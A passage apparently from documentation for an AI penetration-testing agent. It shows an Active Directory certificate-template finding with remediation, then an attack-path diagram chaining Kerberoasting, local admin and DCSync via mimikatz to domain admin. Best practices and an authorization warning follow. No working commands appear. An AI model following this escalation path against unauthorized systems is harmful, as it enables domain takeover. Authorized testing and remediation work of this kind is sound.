━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Technique: AD-PRIV-04
Template: UserAuthentication
Issue: ENROLLEE_SUPPLIES_SUBJECT enabled
Enrollment: Domain Users can enroll
Severity: Critical (CVSS 9.8)
Evidence: Can request cert as Domain Admin
CWE: CWE-295

Remediation:
- Disable ENROLLEE_SUPPLIES_SUBJECT
- Require CA certificate manager approval
- Audit certificate template permissions

[Continuing with remaining assessment phases...]
```

Attack Path Visualization
The agent generates attack path diagrams:
```
┌─────────────────────────────────────────────────────────────┐
│                    ATTACK PATH ANALYSIS                     │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  [Initial Access]                                           │
│        │                                                    │
│        ▼                                                    │
│  ┌─────────┐      Kerberoast      ┌─────────────┐           │
│  │ jsmith  │ ───────────────────► │   svc_sql   │           │
│  └─────────┘                      └──────┬──────┘           │
│                                          │                  │
│                                     LocalAdmin              │
│                                          │                  │
│                                          ▼                  │
│                                   ┌─────────────┐           │
│                                   │    SQL01    │           │
│                                   └──────┬──────┘           │
│                                          │                  │
│                                  DCSync (mimikatz)          │
│                                          │                  │
│                                          ▼                  │
│                                   ┌─────────────┐           │
│                                   │    DC01     │           │
│                                   │  (Domain    │           │
│                                   │   Admin)    │           │
│                                   └─────────────┘           │
│                                                             │
│  Hops: 3 | Likelihood: HIGH | Impact: CRITICAL              │
└─────────────────────────────────────────────────────────────┘
```

Best Practices
- Rules of Engagement - Document scope, timing, and allowed techniques
- Communication - Maintain contact with client during testing
- Evidence Collection - Screenshot and log all findings
- Clean Up - Remove tools, tickets, and artifacts after testing
- Safe Testing - Avoid production system disruption
Caution
Network penetration testing requires explicit written authorization. Unauthorized testing is illegal and can cause significant damage to production systems.
Related Documentation
- Bash Tool - Running network commands
- MCP Kali - Kali Linux tool integration
- Memory Tool - Storing enumeration data
- Report Generator - Creating pentest reports